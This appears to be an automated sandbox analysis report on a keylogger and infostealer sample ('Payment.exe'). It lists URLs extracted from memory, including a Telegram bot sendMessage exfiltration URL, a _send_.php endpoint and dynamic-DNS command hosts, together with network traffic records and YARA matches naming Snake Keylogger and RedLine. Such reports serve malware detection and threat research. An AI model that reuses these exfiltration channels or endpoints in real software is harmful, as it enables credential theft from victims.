Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.13.20:80/pawvnqqcihuodvw
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/dpyks
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/gfoywiqg
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/oqljmnqcm
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/oqljmnqcm4
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111/tknftu
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.142.91.111:80/tknftu
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/buvxjx
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/lpjrtgtrcj
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/tcyrkgcmm
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.229.166.50/
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.229.166.50/pabdnlclvrbkpy
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.245.175.187/idmrbxil
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.245.175.187/idmrbxil&
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.245.175.187/idmrbxilI
Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/pwmdxj
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.212.150.54/(
Source: Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.212.150.54/uqgubhowqkworyccPL
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.212.150.54/uqgubhowqkworyccc
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.212.150.54:80/uqgubhowqkworycc6
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/0?
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/hmjljoygme
Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/klwkdohmlimacmer
Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/klwkdohmlimacmerl
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/wwhsdeosr
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133:80/klwkdohmlimacmer
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.43.119.120/cgdwvsj
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.169.144.97/vxrwonyL
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.169.144.97/vxrwonyp
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.169.144.97:80/vxrwonyvrbkpy
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/sdhhalso
Source: Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140/htdxfxsikhflmhhj
Source: Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140/unklgjihfthc
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140/unklgjihfthcd
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140:80/htdxfxsikhflmhhj
Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140:80/unklgjihfthc
Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://brsua.biz/d
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 0000002B.00000002.2143386918.0000019D59200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://esuzf.biz/
Source: svchost.exe, 0000002B.00000003.1203309926.0000019D58FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gnqgo.biz/H$
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jpskm.biz/
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qpnczch.biz//
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://saytjshyf.biz/
Source: Payment.exe	String found in binary or memory: http://schemas.m
Source: Payment.exe, 00000000.00000002.899266087.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000012.00000002.1037469944.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsdIStudent_Housing.Properties.Resources
Source: Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vyome.biz/
Source: Payment.exe, 00000008.00000002.2124505788.0000000001239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.fwiwk.biz/wjuw?usid=27&utid=12022910910
Source: Payment.exe, 00000008.00000002.2124505788.0000000001239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/ryyftbrdpkr?usid=27&utid=12022893059
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBLr
Source: notification_helper.exe.8.dr	String found in binary or memory: https://clients2.google.com/cr/report
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://comments.adobe.io
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://comments.adobe.io/schemas/annots_metadata.jsonld
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://comments.adobe.io/schemas/bulk_entity_v1.json
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://comments.adobe.io/schemas/user_comment_metadata_result_v1.json
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://dc-api.adobe.io/discovery
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://dc-api.adobe.io/discoverySoftware
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://dc-api.adobe.io/schemas/discovery_v1.json
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://dc-api.adobe.io/schemas/folder_listing_v1.json
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: default-browser-agent.exe.8.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: default-browser-agent.exe.8.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
Source: svchost.exe, 0000002B.00000003.1203309926.0000019D59021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000002B.00000003.1203309926.0000019D58FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: notification_click_helper.exe.8.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: notification_click_helper.exe.8.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: default-browser-agent.exe.8.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://notify-stage.adobe.io/ans
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://notify-stage.adobe.io/ans/
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://notify-stage.adobe.io/anshttps://notify.adobe.io/ansEnableDesktopNotificationlocale
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://notify.adobe.io/ans
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://notify.adobe.io/ans/
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?https://p13n.adobe.io/psdk/v2/content?%Y-%m-%dT%H:%M:%SZ
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://p13n.adobe.io/psdk/v2/content?
Source: Payment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Payment.exe, 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/45.130.83.59
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/45.130.83.59$
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://reviews.adobe.io
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://reviews.adobe.iourifullpayloadlinksinvitationURIreviewURIcommentingAssetURNEurekaInvitationI
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.com
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.com.adobe.ioassetUrnreviewUrnFilesFile
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.com0
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comK
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comReadStatus
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comemptyAnnotations
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.cominvalidAnnotIdList
Source: AdobeCollabSync.exe.8.dr	String found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
Source: AutoIt3Help.exe.8.dr	String found in binary or memory: https://www.autoitscript.com/site/autoit/8
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBLr

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49753 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 18.2.jwBqGZseW.exe.43414a8.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.jwBqGZseW.exe.43414a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.jwBqGZseW.exe.44e24c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
